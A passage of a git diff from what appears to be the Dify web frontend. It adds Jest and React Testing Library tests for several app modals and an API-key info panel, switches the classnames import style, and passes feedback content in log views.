fireEvent.click(screen.getByTestId('create-from-blank')) + + expect(mockOnCreateFromBlank).toHaveBeenCalledTimes(1) + }) + }) + + describe('useKeyPress Integration', () => { + it('should set up ESC key listener when modal is shown', () => { + const { useKeyPress } = require('ahooks') + + render() + + expect(useKeyPress).toHaveBeenCalledWith('esc', expect.any(Function)) + }) + + it('should handle ESC key press to close modal', () => { + const { useKeyPress } = require('ahooks') + let capturedCallback: (() => void) | undefined + + useKeyPress.mockImplementation((key: string, callback: () => void) => { + if (key === 'esc') + capturedCallback = callback + + return jest.fn() + }) + + const mockOnClose = jest.fn() + render() + + expect(capturedCallback).toBeDefined() + expect(typeof capturedCallback).toBe('function') + + // Simulate ESC key press + capturedCallback?.() + + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should not call onClose when ESC key is pressed and modal is not shown', () => { + const { useKeyPress } = require('ahooks') + let capturedCallback: (() => void) | undefined + + useKeyPress.mockImplementation((key: string, callback: () => void) => { + if (key === 'esc') + capturedCallback = callback + + return jest.fn() + }) + + const mockOnClose = jest.fn() + render() + + // The callback should still be created but not execute onClose + expect(capturedCallback).toBeDefined() + + // Simulate ESC key press + capturedCallback?.() + + // onClose should not be called because modal is not shown + expect(mockOnClose).not.toHaveBeenCalled() + }) + }) + + describe('Callback Dependencies', () => { + it('should create stable callback reference for ESC key handler', () => { + const { useKeyPress } = require('ahooks') + + render() + + // Verify that useKeyPress was called with a function + const calls = useKeyPress.mock.calls + expect(calls.length).toBeGreaterThan(0) + expect(calls[0][0]).toBe('esc') + expect(typeof calls[0][1]).toBe('function') + }) + }) + + describe('Edge Cases', () => { + it('should handle null props gracefully', () => { + expect(() => { + render() + }).not.toThrow() + }) + + it('should handle undefined props gracefully', () => { + expect(() => { + render() + }).not.toThrow() + }) + + it('should handle rapid show/hide toggles', () => { + // Test initial state + const { unmount } = render() + unmount() + + // Test show state + render() + expect(screen.getByRole('dialog')).toBeInTheDocument() + + // Test hide state + render() + // Due to transition animations, we just verify the component handles the prop change + expect(() => render()).not.toThrow() + }) + + it('should handle missing optional onCreateFromBlank prop', () => { + const { onCreateFromBlank: _onCreateFromBlank, ...propsWithoutOnCreate } = defaultProps + + expect(() => { + render() + }).not.toThrow() + + expect(screen.getByTestId('app-list')).toBeInTheDocument() + expect(screen.queryByTestId('create-from-blank')).not.toBeInTheDocument() + }) + + it('should work with all required props only', () => { + const requiredProps = { + show: true, + onSuccess: jest.fn(), + onClose: jest.fn(), + } + + expect(() => { + render() + }).not.toThrow() + + expect(screen.getByRole('dialog')).toBeInTheDocument() + expect(screen.getByTestId('app-list')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/create-app-modal/index.tsx b/web/app/components/app/create-app-modal/index.tsx index a449ec8ef2..d74715187f 100644 --- a/web/app/components/app/create-app-modal/index.tsx +++ b/web/app/components/app/create-app-modal/index.tsx @@ -13,7 +13,7 @@ import AppIconPicker from '../../base/app-icon-picker' import type { AppIconSelection } from '../../base/app-icon-picker' import Button from '@/app/components/base/button' import Divider from '@/app/components/base/divider' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { basePath } from '@/utils/var' import { useAppContext } from '@/context/app-context' import { useProviderContext } from '@/context/provider-context' diff --git a/web/app/components/app/create-from-dsl-modal/index.tsx b/web/app/components/app/create-from-dsl-modal/index.tsx index 3564738dfd..0d30a2abac 100644 --- a/web/app/components/app/create-from-dsl-modal/index.tsx +++ b/web/app/components/app/create-from-dsl-modal/index.tsx @@ -25,7 +25,7 @@ import { useProviderContext } from '@/context/provider-context' import AppsFull from '@/app/components/billing/apps-full-in-dialog' import { NEED_REFRESH_APP_LIST_KEY } from '@/config' import { getRedirection } from '@/utils/app-redirection' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { usePluginDependencies } from '@/app/components/workflow/plugin-dependency/hooks' import { noop } from 'lodash-es' import { trackEvent } from '@/app/components/base/amplitude' diff --git a/web/app/components/app/create-from-dsl-modal/uploader.tsx b/web/app/components/app/create-from-dsl-modal/uploader.tsx index b6644da5a4..2745ca84c6 100644 --- a/web/app/components/app/create-from-dsl-modal/uploader.tsx +++ b/web/app/components/app/create-from-dsl-modal/uploader.tsx @@ -8,7 +8,7 @@ import { import { useTranslation } from 'react-i18next' import { useContext } from 'use-context-selector' import { formatFileSize } from '@/utils/format' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { Yaml as YamlIcon } from '@/app/components/base/icons/src/public/files' import { ToastContext } from '@/app/components/base/toast' import ActionButton from '@/app/components/base/action-button' diff --git a/web/app/components/app/duplicate-modal/index.spec.tsx b/web/app/components/app/duplicate-modal/index.spec.tsx new file mode 100644 index 0000000000..2d73addeab --- /dev/null +++ b/web/app/components/app/duplicate-modal/index.spec.tsx @@ -0,0 +1,167 @@ +import React from 'react' +import { render, screen } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import DuplicateAppModal from './index' +import Toast from '@/app/components/base/toast' +import type { ProviderContextState } from '@/context/provider-context' +import { baseProviderContextValue } from '@/context/provider-context' +import { Plan } from '@/app/components/billing/type' + +const appsFullRenderSpy = jest.fn() +jest.mock('@/app/components/billing/apps-full-in-dialog', () => ({ + __esModule: true, + default: ({ loc }: { loc: string }) => { + appsFullRenderSpy(loc) + return
    AppsFull
    + }, +})) + +const useProviderContextMock = jest.fn() +jest.mock('@/context/provider-context', () => { + const actual = jest.requireActual('@/context/provider-context') + return { + ...actual, + useProviderContext: () => useProviderContextMock(), + } +}) + +const renderComponent = (overrides: Partial> = {}) => { + const onConfirm = jest.fn().mockResolvedValue(undefined) + const onHide = jest.fn() + const props: React.ComponentProps = { + appName: 'My App', + icon_type: 'emoji', + icon: '🚀', + icon_background: '#FFEAD5', + icon_url: null, + show: true, + onConfirm, + onHide, + ...overrides, + } + const utils = render() + return { + ...utils, + onConfirm, + onHide, + } +} + +const setupProviderContext = (overrides: Partial = {}) => { + useProviderContextMock.mockReturnValue({ + ...baseProviderContextValue, + plan: { + ...baseProviderContextValue.plan, + type: Plan.sandbox, + usage: { + ...baseProviderContextValue.plan.usage, + buildApps: 0, + }, + total: { + ...baseProviderContextValue.plan.total, + buildApps: 10, + }, + }, + enableBilling: false, + ...overrides, + } as ProviderContextState) +} + +describe('DuplicateAppModal', () => { + beforeEach(() => { + jest.clearAllMocks() + setupProviderContext() + }) + + // Rendering output based on modal visibility. + describe('Rendering', () => { + it('should render modal content when show is true', () => { + // Arrange + renderComponent() + + // Assert + expect(screen.getByText('app.duplicateTitle')).toBeInTheDocument() + expect(screen.getByDisplayValue('My App')).toBeInTheDocument() + }) + + it('should not render modal content when show is false', () => { + // Arrange + renderComponent({ show: false }) + + // Assert + expect(screen.queryByText('app.duplicateTitle')).not.toBeInTheDocument() + }) + }) + + // Prop-driven states such as full plan handling. + describe('Props', () => { + it('should disable duplicate button and show apps full content when plan is full', () => { + // Arrange + setupProviderContext({ + enableBilling: true, + plan: { + ...baseProviderContextValue.plan, + type: Plan.sandbox, + usage: { ...baseProviderContextValue.plan.usage, buildApps: 10 }, + total: { ...baseProviderContextValue.plan.total, buildApps: 10 }, + }, + }) + renderComponent() + + // Assert + expect(screen.getByTestId('apps-full')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'app.duplicate' })).toBeDisabled() + }) + }) + + // User interactions for cancel and confirm flows. + describe('Interactions', () => { + it('should call onHide when cancel is clicked', async () => { + const user = userEvent.setup() + // Arrange + const { onHide } = renderComponent() + + // Act + await user.click(screen.getByRole('button', { name: 'common.operation.cancel' })) + + // Assert + expect(onHide).toHaveBeenCalledTimes(1) + }) + + it('should show error toast when name is empty', async () => { + const user = userEvent.setup() + const toastSpy = jest.spyOn(Toast, 'notify') + // Arrange + const { onConfirm, onHide } = renderComponent() + + // Act + await user.clear(screen.getByDisplayValue('My App')) + await user.click(screen.getByRole('button', { name: 'app.duplicate' })) + + // Assert + expect(toastSpy).toHaveBeenCalledWith({ type: 'error', message: 'explore.appCustomize.nameRequired' }) + expect(onConfirm).not.toHaveBeenCalled() + expect(onHide).not.toHaveBeenCalled() + }) + + it('should submit app info and hide modal when duplicate is clicked', async () => { + const user = userEvent.setup() + // Arrange + const { onConfirm, onHide } = renderComponent() + + // Act + await user.clear(screen.getByDisplayValue('My App')) + await user.type(screen.getByRole('textbox'), 'New App') + await user.click(screen.getByRole('button', { name: 'app.duplicate' })) + + // Assert + expect(onConfirm).toHaveBeenCalledWith({ + name: 'New App', + icon_type: 'emoji', + icon: '🚀', + icon_background: '#FFEAD5', + }) + expect(onHide).toHaveBeenCalledTimes(1) + }) + }) +}) diff --git a/web/app/components/app/duplicate-modal/index.tsx b/web/app/components/app/duplicate-modal/index.tsx index f98fb831ed..f25eb5373d 100644 --- a/web/app/components/app/duplicate-modal/index.tsx +++ b/web/app/components/app/duplicate-modal/index.tsx @@ -3,7 +3,7 @@ import React, { useState } from 'react' import { useTranslation } from 'react-i18next' import { RiCloseLine } from '@remixicon/react' import AppIconPicker from '../../base/app-icon-picker' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Modal from '@/app/components/base/modal' import Button from '@/app/components/base/button' import Input from '@/app/components/base/input' diff --git a/web/app/components/app/log-annotation/index.tsx b/web/app/components/app/log-annotation/index.tsx index c0b0854b29..e7c2be3eed 100644 --- a/web/app/components/app/log-annotation/index.tsx +++ b/web/app/components/app/log-annotation/index.tsx @@ -3,7 +3,7 @@ import type { FC } from 'react' import React, { useMemo } from 'react' import { useTranslation } from 'react-i18next' import { useRouter } from 'next/navigation' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Log from '@/app/components/app/log' import WorkflowLog from '@/app/components/app/workflow-log' import Annotation from '@/app/components/app/annotation' diff --git a/web/app/components/app/log/list.tsx b/web/app/components/app/log/list.tsx index d21d35eeee..e479cbe881 100644 --- a/web/app/components/app/log/list.tsx +++ b/web/app/components/app/log/list.tsx @@ -39,7 +39,7 @@ import Tooltip from '@/app/components/base/tooltip' import CopyIcon from '@/app/components/base/copy-icon' import { buildChatItemTree, getThreadMessages } from '@/app/components/base/chat/utils' import { getProcessedFilesFromResponse } from '@/app/components/base/file-uploader/utils' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { noop } from 'lodash-es' import PromptLogModal from '../../base/prompt-log-modal' import { WorkflowContextProvider } from '@/app/components/workflow/context' @@ -816,9 +816,12 @@ const CompletionConversationDetailComp: FC<{ appId?: string; conversationId?: st const { notify } = useContext(ToastContext) const { t } = useTranslation() - const handleFeedback = async (mid: string, { rating }: FeedbackType): Promise => { + const handleFeedback = async (mid: string, { rating, content }: FeedbackType): Promise => { try { - await updateLogMessageFeedbacks({ url: `/apps/${appId}/feedbacks`, body: { message_id: mid, rating } }) + await updateLogMessageFeedbacks({ + url: `/apps/${appId}/feedbacks`, + body: { message_id: mid, rating, content: content ?? undefined }, + }) conversationDetailMutate() notify({ type: 'success', message: t('common.actionMsg.modifiedSuccessfully') }) return true @@ -861,9 +864,12 @@ const ChatConversationDetailComp: FC<{ appId?: string; conversationId?: string } const { notify } = useContext(ToastContext) const { t } = useTranslation() - const handleFeedback = async (mid: string, { rating }: FeedbackType): Promise => { + const handleFeedback = async (mid: string, { rating, content }: FeedbackType): Promise => { try { - await updateLogMessageFeedbacks({ url: `/apps/${appId}/feedbacks`, body: { message_id: mid, rating } }) + await updateLogMessageFeedbacks({ + url: `/apps/${appId}/feedbacks`, + body: { message_id: mid, rating, content: content ?? undefined }, + }) notify({ type: 'success', message: t('common.actionMsg.modifiedSuccessfully') }) return true } diff --git a/web/app/components/app/log/model-info.tsx b/web/app/components/app/log/model-info.tsx index 626ef093e9..b3c4f11be5 100644 --- a/web/app/components/app/log/model-info.tsx +++ b/web/app/components/app/log/model-info.tsx @@ -13,7 +13,7 @@ import { PortalToFollowElemTrigger, } from '@/app/components/base/portal-to-follow-elem' import { useTextGenerationCurrentProviderAndModelAndModelList } from '@/app/components/header/account-setting/model-provider-page/hooks' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' const PARAM_MAP = { temperature: 'Temperature', diff --git a/web/app/components/app/log/var-panel.tsx b/web/app/components/app/log/var-panel.tsx index dd8c231a56..8915b3438a 100644 --- a/web/app/components/app/log/var-panel.tsx +++ b/web/app/components/app/log/var-panel.tsx @@ -9,7 +9,7 @@ import { } from '@remixicon/react' import { Variable02 } from '@/app/components/base/icons/src/vender/solid/development' import ImagePreview from '@/app/components/base/image-uploader/image-preview' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' type Props = { varList: { label: string; value: string }[] diff --git a/web/app/components/app/overview/apikey-info-panel/apikey-info-panel.test-utils.tsx b/web/app/components/app/overview/apikey-info-panel/apikey-info-panel.test-utils.tsx new file mode 100644 index 0000000000..1b1e729546 --- /dev/null +++ b/web/app/components/app/overview/apikey-info-panel/apikey-info-panel.test-utils.tsx @@ -0,0 +1,209 @@ +import type { RenderOptions } from '@testing-library/react' +import { fireEvent, render } from '@testing-library/react' +import { defaultPlan } from '@/app/components/billing/config' +import { noop } from 'lodash-es' +import type { ModalContextState } from '@/context/modal-context' +import APIKeyInfoPanel from './index' + +// Mock the modules before importing the functions +jest.mock('@/context/provider-context', () => ({ + useProviderContext: jest.fn(), +})) + +jest.mock('@/context/modal-context', () => ({ + useModalContext: jest.fn(), +})) + +import { useProviderContext as actualUseProviderContext } from '@/context/provider-context' +import { useModalContext as actualUseModalContext } from '@/context/modal-context' + +// Type casting for mocks +const mockUseProviderContext = actualUseProviderContext as jest.MockedFunction +const mockUseModalContext = actualUseModalContext as jest.MockedFunction + +// Default mock data +const defaultProviderContext = { + modelProviders: [], + refreshModelProviders: noop, + textGenerationModelList: [], + supportRetrievalMethods: [], + isAPIKeySet: false, + plan: defaultPlan, + isFetchedPlan: false, + enableBilling: false, + onPlanInfoChanged: noop, + enableReplaceWebAppLogo: false, + modelLoadBalancingEnabled: false, + datasetOperatorEnabled: false, + enableEducationPlan: false, + isEducationWorkspace: false, + isEducationAccount: false, + allowRefreshEducationVerify: false, + educationAccountExpireAt: null, + isLoadingEducationAccountInfo: false, + isFetchingEducationAccountInfo: false, + webappCopyrightEnabled: false, + licenseLimit: { + workspace_members: { + size: 0, + limit: 0, + }, + }, + refreshLicenseLimit: noop, + isAllowTransferWorkspace: false, + isAllowPublishAsCustomKnowledgePipelineTemplate: false, +} + +const defaultModalContext: ModalContextState = { + setShowAccountSettingModal: noop, + setShowApiBasedExtensionModal: noop, + setShowModerationSettingModal: noop, + setShowExternalDataToolModal: noop, + setShowPricingModal: noop, + setShowAnnotationFullModal: noop, + setShowModelModal: noop, + setShowExternalKnowledgeAPIModal: noop, + setShowModelLoadBalancingModal: noop, + setShowOpeningModal: noop, + setShowUpdatePluginModal: noop, + setShowEducationExpireNoticeModal: noop, + setShowTriggerEventsLimitModal: noop, +} + +export type MockOverrides = { + providerContext?: Partial + modalContext?: Partial +} + +export type APIKeyInfoPanelRenderOptions = { + mockOverrides?: MockOverrides +} & Omit + +// Setup function to configure mocks +export function setupMocks(overrides: MockOverrides = {}) { + mockUseProviderContext.mockReturnValue({ + ...defaultProviderContext, + ...overrides.providerContext, + }) + + mockUseModalContext.mockReturnValue({ + ...defaultModalContext, + ...overrides.modalContext, + }) +} + +// Custom render function +export function renderAPIKeyInfoPanel(options: APIKeyInfoPanelRenderOptions = {}) { + const { mockOverrides, ...renderOptions } = options + + setupMocks(mockOverrides) + + return render(, renderOptions) +} + +// Helper functions for common test scenarios +export const scenarios = { + // Render with API key not set (default) + withAPIKeyNotSet: (overrides: MockOverrides = {}) => + renderAPIKeyInfoPanel({ + mockOverrides: { + providerContext: { isAPIKeySet: false }, + ...overrides, + }, + }), + + // Render with API key already set + withAPIKeySet: (overrides: MockOverrides = {}) => + renderAPIKeyInfoPanel({ + mockOverrides: { + providerContext: { isAPIKeySet: true }, + ...overrides, + }, + }), + + // Render with mock modal function + withMockModal: (mockSetShowAccountSettingModal: jest.Mock, overrides: MockOverrides = {}) => + renderAPIKeyInfoPanel({ + mockOverrides: { + modalContext: { setShowAccountSettingModal: mockSetShowAccountSettingModal }, + ...overrides, + }, + }), +} + +// Common test assertions +export const assertions = { + // Should render main button + shouldRenderMainButton: () => { + const button = document.querySelector('button.btn-primary') + expect(button).toBeInTheDocument() + return button + }, + + // Should not render at all + shouldNotRender: (container: HTMLElement) => { + expect(container.firstChild).toBeNull() + }, + + // Should have correct panel styling + shouldHavePanelStyling: (panel: HTMLElement) => { + expect(panel).toHaveClass( + 'border-components-panel-border', + 'bg-components-panel-bg', + 'relative', + 'mb-6', + 'rounded-2xl', + 'border', + 'p-8', + 'shadow-md', + ) + }, + + // Should have close button + shouldHaveCloseButton: (container: HTMLElement) => { + const closeButton = container.querySelector('.absolute.right-4.top-4') + expect(closeButton).toBeInTheDocument() + expect(closeButton).toHaveClass('cursor-pointer') + return closeButton + }, +} + +// Common user interactions +export const interactions = { + // Click the main button + clickMainButton: () => { + const button = document.querySelector('button.btn-primary') + if (button) fireEvent.click(button) + return button + }, + + // Click the close button + clickCloseButton: (container: HTMLElement) => { + const closeButton = container.querySelector('.absolute.right-4.top-4') + if (closeButton) fireEvent.click(closeButton) + return closeButton + }, +} + +// Text content keys for assertions +export const textKeys = { + selfHost: { + titleRow1: /appOverview\.apiKeyInfo\.selfHost\.title\.row1/, + titleRow2: /appOverview\.apiKeyInfo\.selfHost\.title\.row2/, + setAPIBtn: /appOverview\.apiKeyInfo\.setAPIBtn/, + tryCloud: /appOverview\.apiKeyInfo\.tryCloud/, + }, + cloud: { + trialTitle: /appOverview\.apiKeyInfo\.cloud\.trial\.title/, + trialDescription: /appOverview\.apiKeyInfo\.cloud\.trial\.description/, + setAPIBtn: /appOverview\.apiKeyInfo\.setAPIBtn/, + }, +} + +// Setup and cleanup utilities +export function clearAllMocks() { + jest.clearAllMocks() +} + +// Export mock functions for external access +export { mockUseProviderContext, mockUseModalContext, defaultModalContext } diff --git a/web/app/components/app/overview/apikey-info-panel/cloud.spec.tsx b/web/app/components/app/overview/apikey-info-panel/cloud.spec.tsx new file mode 100644 index 0000000000..c7cb061fde --- /dev/null +++ b/web/app/components/app/overview/apikey-info-panel/cloud.spec.tsx @@ -0,0 +1,122 @@ +import { cleanup, screen } from '@testing-library/react' +import { ACCOUNT_SETTING_TAB } from '@/app/components/header/account-setting/constants' +import { + assertions, + clearAllMocks, + defaultModalContext, + interactions, + mockUseModalContext, + scenarios, + textKeys, +} from './apikey-info-panel.test-utils' + +// Mock config for Cloud edition +jest.mock('@/config', () => ({ + IS_CE_EDITION: false, // Test Cloud edition +})) + +afterEach(cleanup) + +describe('APIKeyInfoPanel - Cloud Edition', () => { + const mockSetShowAccountSettingModal = jest.fn() + + beforeEach(() => { + clearAllMocks() + mockUseModalContext.mockReturnValue({ + ...defaultModalContext, + setShowAccountSettingModal: mockSetShowAccountSettingModal, + }) + }) + + describe('Rendering', () => { + it('should render without crashing when API key is not set', () => { + scenarios.withAPIKeyNotSet() + assertions.shouldRenderMainButton() + }) + + it('should not render when API key is already set', () => { + const { container } = scenarios.withAPIKeySet() + assertions.shouldNotRender(container) + }) + + it('should not render when panel is hidden by user', () => { + const { container } = scenarios.withAPIKeyNotSet() + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Cloud Edition Content', () => { + it('should display cloud version title', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByText(textKeys.cloud.trialTitle)).toBeInTheDocument() + }) + + it('should display emoji for cloud version', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.querySelector('em-emoji')).toBeInTheDocument() + expect(container.querySelector('em-emoji')).toHaveAttribute('id', '😀') + }) + + it('should display cloud version description', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByText(textKeys.cloud.trialDescription)).toBeInTheDocument() + }) + + it('should not render external link for cloud version', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.querySelector('a[href="https://cloud.dify.ai/apps"]')).not.toBeInTheDocument() + }) + + it('should display set API button text', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByText(textKeys.cloud.setAPIBtn)).toBeInTheDocument() + }) + }) + + describe('User Interactions', () => { + it('should call setShowAccountSettingModal when set API button is clicked', () => { + scenarios.withMockModal(mockSetShowAccountSettingModal) + + interactions.clickMainButton() + + expect(mockSetShowAccountSettingModal).toHaveBeenCalledWith({ + payload: ACCOUNT_SETTING_TAB.PROVIDER, + }) + }) + + it('should hide panel when close button is clicked', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.firstChild).toBeInTheDocument() + + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Props and Styling', () => { + it('should render button with primary variant', () => { + scenarios.withAPIKeyNotSet() + const button = screen.getByRole('button') + expect(button).toHaveClass('btn-primary') + }) + + it('should render panel container with correct classes', () => { + const { container } = scenarios.withAPIKeyNotSet() + const panel = container.firstChild as HTMLElement + assertions.shouldHavePanelStyling(panel) + }) + }) + + describe('Accessibility', () => { + it('should have button with proper role', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByRole('button')).toBeInTheDocument() + }) + + it('should have clickable close button', () => { + const { container } = scenarios.withAPIKeyNotSet() + assertions.shouldHaveCloseButton(container) + }) + }) +}) diff --git a/web/app/components/app/overview/apikey-info-panel/index.spec.tsx b/web/app/components/app/overview/apikey-info-panel/index.spec.tsx new file mode 100644 index 0000000000..62eeb4299e --- /dev/null +++ b/web/app/components/app/overview/apikey-info-panel/index.spec.tsx @@ -0,0 +1,162 @@ +import { cleanup, screen } from '@testing-library/react' +import { ACCOUNT_SETTING_TAB } from '@/app/components/header/account-setting/constants' +import { + assertions, + clearAllMocks, + defaultModalContext, + interactions, + mockUseModalContext, + scenarios, + textKeys, +} from './apikey-info-panel.test-utils' + +// Mock config for CE edition +jest.mock('@/config', () => ({ + IS_CE_EDITION: true, // Test CE edition by default +})) + +afterEach(cleanup) + +describe('APIKeyInfoPanel - Community Edition', () => { + const mockSetShowAccountSettingModal = jest.fn() + + beforeEach(() => { + clearAllMocks() + mockUseModalContext.mockReturnValue({ + ...defaultModalContext, + setShowAccountSettingModal: mockSetShowAccountSettingModal, + }) + }) + + describe('Rendering', () => { + it('should render without crashing when API key is not set', () => { + scenarios.withAPIKeyNotSet() + assertions.shouldRenderMainButton() + }) + + it('should not render when API key is already set', () => { + const { container } = scenarios.withAPIKeySet() + assertions.shouldNotRender(container) + }) + + it('should not render when panel is hidden by user', () => { + const { container } = scenarios.withAPIKeyNotSet() + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Content Display', () => { + it('should display self-host title content', () => { + scenarios.withAPIKeyNotSet() + + expect(screen.getByText(textKeys.selfHost.titleRow1)).toBeInTheDocument() + expect(screen.getByText(textKeys.selfHost.titleRow2)).toBeInTheDocument() + }) + + it('should display set API button text', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByText(textKeys.selfHost.setAPIBtn)).toBeInTheDocument() + }) + + it('should render external link with correct href for self-host version', () => { + const { container } = scenarios.withAPIKeyNotSet() + const link = container.querySelector('a[href="https://cloud.dify.ai/apps"]') + + expect(link).toBeInTheDocument() + expect(link).toHaveAttribute('target', '_blank') + expect(link).toHaveAttribute('rel', 'noopener noreferrer') + expect(link).toHaveTextContent(textKeys.selfHost.tryCloud) + }) + + it('should have external link with proper styling for self-host version', () => { + const { container } = scenarios.withAPIKeyNotSet() + const link = container.querySelector('a[href="https://cloud.dify.ai/apps"]') + + expect(link).toHaveClass( + 'mt-2', + 'flex', + 'h-[26px]', + 'items-center', + 'space-x-1', + 'p-1', + 'text-xs', + 'font-medium', + 'text-[#155EEF]', + ) + }) + }) + + describe('User Interactions', () => { + it('should call setShowAccountSettingModal when set API button is clicked', () => { + scenarios.withMockModal(mockSetShowAccountSettingModal) + + interactions.clickMainButton() + + expect(mockSetShowAccountSettingModal).toHaveBeenCalledWith({ + payload: ACCOUNT_SETTING_TAB.PROVIDER, + }) + }) + + it('should hide panel when close button is clicked', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.firstChild).toBeInTheDocument() + + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Props and Styling', () => { + it('should render button with primary variant', () => { + scenarios.withAPIKeyNotSet() + const button = screen.getByRole('button') + expect(button).toHaveClass('btn-primary') + }) + + it('should render panel container with correct classes', () => { + const { container } = scenarios.withAPIKeyNotSet() + const panel = container.firstChild as HTMLElement + assertions.shouldHavePanelStyling(panel) + }) + }) + + describe('State Management', () => { + it('should start with visible panel (isShow: true)', () => { + scenarios.withAPIKeyNotSet() + assertions.shouldRenderMainButton() + }) + + it('should toggle visibility when close button is clicked', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.firstChild).toBeInTheDocument() + + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Edge Cases', () => { + it('should handle provider context loading state', () => { + scenarios.withAPIKeyNotSet({ + providerContext: { + modelProviders: [], + textGenerationModelList: [], + }, + }) + assertions.shouldRenderMainButton() + }) + }) + + describe('Accessibility', () => { + it('should have button with proper role', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByRole('button')).toBeInTheDocument() + }) + + it('should have clickable close button', () => { + const { container } = scenarios.withAPIKeyNotSet() + assertions.shouldHaveCloseButton(container) + }) + }) +}) diff --git a/web/app/components/app/overview/apikey-info-panel/index.tsx b/web/app/components/app/overview/apikey-info-panel/index.tsx index b50b0077cb..47fe7af972 100644 --- a/web/app/components/app/overview/apikey-info-panel/index.tsx +++ b/web/app/components/app/overview/apikey-info-panel/index.tsx @@ -3,7 +3,7 @@ import type { FC } from 'react' import React, { useState } from 'react' import { useTranslation } from 'react-i18next' import { RiCloseLine } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Button from '@/app/components/base/button' import { LinkExternal02 } from '@/app/components/base/icons/src/vender/line/general' import { IS_CE_EDITION } from '@/config' diff --git a/web/app/components/app/overview/app-card.tsx b/web/app/components/app/overview/app-card.tsx index a0f5780b71..15762923ff 100644 --- a/web/app/components/app/overview/app-card.tsx +++ b/web/app/components/app/overview/app-card.tsx @@ -401,7 +401,6 @@ function AppCard({ /> setShowCustomizeModal(false)} appId={appInfo.id} api_base_url={appInfo.api_base_url} diff --git a/web/app/components/app/overview/customize/index.spec.tsx b/web/app/components/app/overview/customize/index.spec.tsx new file mode 100644 index 0000000000..c960101b66 --- /dev/null +++ b/web/app/components/app/overview/customize/index.spec.tsx @@ -0,0 +1,434 @@ +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import CustomizeModal from './index' +import { AppModeEnum } from '@/types/app' + +// Mock useDocLink from context +const mockDocLink = jest.fn((path?: string) => `https://docs.dify.ai/en-US${path || ''}`) +jest.mock('@/context/i18n', () => ({ + useDocLink: () => mockDocLink, +})) + +// Mock window.open +const mockWindowOpen = jest.fn() +Object.defineProperty(window, 'open', { + value: mockWindowOpen, + writable: true, +}) + +describe('CustomizeModal', () => { + const defaultProps = { + isShow: true, + onClose: jest.fn(), + api_base_url: 'https://api.example.com', + appId: 'test-app-id-123', + mode: AppModeEnum.CHAT, + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering tests - verify component renders correctly with various configurations + describe('Rendering', () => { + it('should render without crashing when isShow is true', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.title')).toBeInTheDocument() + }) + }) + + it('should not render content when isShow is false', async () => { + // Arrange + const props = { ...defaultProps, isShow: false } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.queryByText('appOverview.overview.appInfo.customize.title')).not.toBeInTheDocument() + }) + }) + + it('should render modal description', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.explanation')).toBeInTheDocument() + }) + }) + + it('should render way 1 and way 2 tags', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.way 1')).toBeInTheDocument() + expect(screen.getByText('appOverview.overview.appInfo.customize.way 2')).toBeInTheDocument() + }) + }) + + it('should render all step numbers (1, 2, 3)', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('1')).toBeInTheDocument() + expect(screen.getByText('2')).toBeInTheDocument() + expect(screen.getByText('3')).toBeInTheDocument() + }) + }) + + it('should render step instructions', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step1')).toBeInTheDocument() + expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step2')).toBeInTheDocument() + expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step3')).toBeInTheDocument() + }) + }) + + it('should render environment variables with appId and api_base_url', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement).toBeInTheDocument() + expect(preElement?.textContent).toContain('NEXT_PUBLIC_APP_ID=\'test-app-id-123\'') + expect(preElement?.textContent).toContain('NEXT_PUBLIC_API_URL=\'https://api.example.com\'') + }) + }) + + it('should render GitHub icon in step 1 button', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - find the GitHub link and verify it contains an SVG icon + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toBeInTheDocument() + 